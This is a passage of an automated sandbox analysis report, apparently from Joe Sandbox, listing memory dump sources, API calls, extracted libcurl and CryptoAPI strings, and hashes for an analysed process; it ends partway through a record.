                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$memcpymemmove
                                                                                                                                                                                                                                                            • String ID: schannel: Curl_read_plain returned CURLE_AGAIN$schannel: Curl_read_plain returned CURLE_RECV_ERROR$schannel: Curl_read_plain returned error %d$schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: can't renogotiate, an error is pending$schannel: can't renogotiate, encrypted data available$schannel: client wants to read %zu bytes$schannel: decrypted data added: %zu$schannel: decrypted data buffer: offset %zu length %zu$schannel: decrypted data cached: offset %zu length %zu$schannel: decrypted data length: %lu$schannel: decrypted data returned %zu$schannel: encdata_buffer resized %zu$schannel: encrypted data buffer: offset %zu length %zu$schannel: encrypted data cached: offset %zu length %zu$schannel: encrypted data got %zd$schannel: encrypted data length: %lu$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: schannel_recv cleanup$schannel: server closed abruptly (missing close_notify)$schannel: server closed the connection$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                                                                                                                                                                                                                                            • API String ID: 3930488757-1393157870
                                                                                                                                                                                                                                                            • Opcode ID: 539959690036a5cf60408dd6a035ab2b17a93d889566567d5506cfb0334049ce
                                                                                                                                                                                                                                                            • Instruction ID: e2fe55d9a255850b8132bbc650c4ce4be923c5e5ba921041e5aa0476d9e611a1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 539959690036a5cf60408dd6a035ab2b17a93d889566567d5506cfb0334049ce
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E22CC706243019FC711DF14C985F2A77B4AF98305F24856DF9494B362E3B5E8A8CF86
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strstr$memcmp$fseekstrlen$fclosefopenfreadftellmemcpystrncmp
                                                                                                                                                                                                                                                            • String ID: public key hash: sha256//%s$-----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$;sha256//$sha256//
                                                                                                                                                                                                                                                            • API String ID: 1176492844-471711153
                                                                                                                                                                                                                                                            • Opcode ID: cbcaa87837b80718ab33429eaf496181a98bb698861760f8bec95546bf501c9b
                                                                                                                                                                                                                                                            • Instruction ID: cbb22e057f86a2f365b4494897d0ef18a32a07e209c378c77a7c4035e2028916
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbcaa87837b80718ab33429eaf496181a98bb698861760f8bec95546bf501c9b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65A10AB1D14302ABEB209F25DD85B2B76E89B50305F080879FD4987283F679DC588B6B
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$fwrite$htonsmemset
                                                                                                                                                                                                                                                            • String ID: %s$%s%02x%02x$AAAA$CNAME: %s$Could not DOH-resolve: %s$DOH A: %u.%u.%u.%u$DOH AAAA: $DOH Host name: %s$DOH: %s type %s for %s$TTL: %u seconds$bad error code
                                                                                                                                                                                                                                                            • API String ID: 2611945536-4053692942
                                                                                                                                                                                                                                                            • Opcode ID: d719e91c779842e6a5e46411ff31bfe461c8aea50b9cb71b069dcfc90b62e3cc
                                                                                                                                                                                                                                                            • Instruction ID: d9b4fd013274e6fed7a1614941ce6c1eca37497f4dc6ec5a7608a4e3addb8792
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d719e91c779842e6a5e46411ff31bfe461c8aea50b9cb71b069dcfc90b62e3cc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F14971914240AFDB21AF25DC45BAB77E8AF45305F080439FC4986283E7799E648BA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strncmp
                                                                                                                                                                                                                                                            • String ID: $$%$%ld$(nil)$-$.%ld$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz$I32$I64
                                                                                                                                                                                                                                                            • API String ID: 1114863663-1693084657
                                                                                                                                                                                                                                                            • Opcode ID: 82845597eca72a38fafe833d993ac15f1bbca8b39697cfd9de70a9702ef7a5a0
                                                                                                                                                                                                                                                            • Instruction ID: 1bdb17fd84625c50734bb9641d101dcc34298b9ccde2f55ced68f54ae99e5a2e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82845597eca72a38fafe833d993ac15f1bbca8b39697cfd9de70a9702ef7a5a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BB2E030928342CFD719DF19C48476ABBE1EF84324F640A2DF8D687291D7B0D969CB92
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                                                                                                                                                            • API String ID: 0-1595554923
                                                                                                                                                                                                                                                            • Opcode ID: a73d224f2fd6ca997fa1703d88b19ffc970a7e0b1df54b178db201b149fa80f2
                                                                                                                                                                                                                                                            • Instruction ID: 7d7f8999a9bf7664164f69637015a9f672ace7ec06a5e79551631a1429e0e4fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a73d224f2fd6ca997fa1703d88b19ffc970a7e0b1df54b178db201b149fa80f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83D12AB1A343069FDB21DE25C885732B7D4AF453C6F446429EC858B342E3B5DE2C8B99
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: GMT$%.4s-%.2s-%.2s %.2s:%.2s:%c%c%s%.*s%s%.*s$%02x:$%s%lx$%u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$0$0$FALSE$GMT$TRUE$TUUU$TUUU$TUUU
                                                                                                                                                                                                                                                            • API String ID: 0-1939689028
                                                                                                                                                                                                                                                            • Opcode ID: 53585879f52368380b4ff6db7fe96a107281ce9b83b2f3619504001c23f7558a
                                                                                                                                                                                                                                                            • Instruction ID: bf160cb66b237d535c3bad10be20451ea3683afeddba5f072ed06496eba5485c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53585879f52368380b4ff6db7fe96a107281ce9b83b2f3619504001c23f7558a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AE12479A252A14FDB04BE18888C7767BD9DB81308F18857DD849CB3C3E67ACD66C781
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlen$strcpy$strtol
                                                                                                                                                                                                                                                            • String ID: %%%02x$&$@*sv
                                                                                                                                                                                                                                                            • API String ID: 2637003386-201442823
                                                                                                                                                                                                                                                            • Opcode ID: 257d7e61d20b37d5f0c334fbfb9c783b4bb0158919dbda1d24e6394941c7abc2
                                                                                                                                                                                                                                                            • Instruction ID: e1b90c695bfc7a76cf738c121754ad3f6a47f9e42677d88ee7a0acf6e7425d56
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 257d7e61d20b37d5f0c334fbfb9c783b4bb0158919dbda1d24e6394941c7abc2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC02F9745192029FF7107F28DC457AA77B5AF40308F084836F98A86293EB79D974C797
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memchr$_errno
                                                                                                                                                                                                                                                            • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef
                                                                                                                                                                                                                                                            • API String ID: 2043447294-3773776233
                                                                                                                                                                                                                                                            • Opcode ID: 212f0f818da81845c965a380a088b9f7580d2606af26fc0f034cd04925041c71
                                                                                                                                                                                                                                                            • Instruction ID: 74b5e5bf67630f481928ffb4155812d426024e714c37f6bb5a6085100ce2f78d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 212f0f818da81845c965a380a088b9f7580d2606af26fc0f034cd04925041c71
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97B1BD316683468FD728DF24C09476BBBE1EB85748F19882EE8C987281D7B58D95CB42
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CountTickfflushfputsmemset
                                                                                                                                                                                                                                                            • String ID: %%-%ds %%5.1f%%%%$#$%*s$-$-=O=
                                                                                                                                                                                                                                                            • API String ID: 6529526-1632668997
                                                                                                                                                                                                                                                            • Opcode ID: b73d0784cf842669cac922ae8d60f42794437a8a764bdc7482b445bd963b1a8f
                                                                                                                                                                                                                                                            • Instruction ID: e497c8a707088579182ffccaf3a43da0a2f04204f3f6bc9582e1319f6b3dab74
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b73d0784cf842669cac922ae8d60f42794437a8a764bdc7482b445bd963b1a8f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45C19B716087009FC718DF2AC880A5AF7E6FFC8314F158A2EE899C7391D670E9598B52
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0025C7AD
                                                                                                                                                                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,?,F0000000), ref: 0025C7C4
                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(?,?,00000000,00000000), ref: 0025C7E1
                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 0025C7F3
                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000004,?,?,00000000), ref: 0025C80F
                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 0025C830
                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0025C83E
                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0025C84F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyReleasememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2041421932-0
                                                                                                                                                                                                                                                            • Opcode ID: 9a0558f27c989058cfce45370a29e05474d0be7fa0fa845ec91df7f866be6068
                                                                                                                                                                                                                                                            • Instruction ID: 6440387196a47f31b7051c68fab5eeeac3108da3b7f6c3c89bf3b265072ca00a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a0558f27c989058cfce45370a29e05474d0be7fa0fa845ec91df7f866be6068
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9213BB0214341BFE7209F15DC49F1BBBA8EF80B45F54482CFA84A6190E771D818DB6A
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_65_2_230000_qrl.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: strlenstrncmp
                                                                                                                                                                                                                                                            • String ID: The file name argument '%s' looks like a flag.$no-$zFL$}FL
                                                                                                                                                                                                                                                            • API String ID: 1310274236-3308125045
                                                                                                                                                                                                                                                            • Opcode ID: 7793e53060a4fede5e52a37d525f12e13981ea90201f4a4e1bd57b36aa917d4e
                                                                                                                                                                                                                                                            • Instruction ID: 364c2e84c164372a220d0936647e551c9c56876a9f4dc646b33982865d31e7c1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7793e53060a4fede5e52a37d525f12e13981ea90201f4a4e1bd57b36aa917d4e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAD13AB55183448FD324CF18D4887DABBE1FFC8304F248A6EE8899B255D7729956CF82
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • Failed writing body (%zu != %zu), xrefs: 002678F8
                                                                                                                                                                                                                                                            • Write callback asked for PAUSE when not supported!, xrefs: 0026790B
                                                                                                                                                                                                                                                            • Failed writing header, xrefs: 0026791E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000041.00000002.3099006228.0000000000231000.00000020.00000001.01000000.00000018.sdmp, Offset: 00230000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3098950242.0000000000230000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099885896.00000000004BE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3099952802.00000000004C2000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100252244.0000000000581000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100346198.0000000000586000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.0000000000587000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000041.00000002.3104745511.000000000058B000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
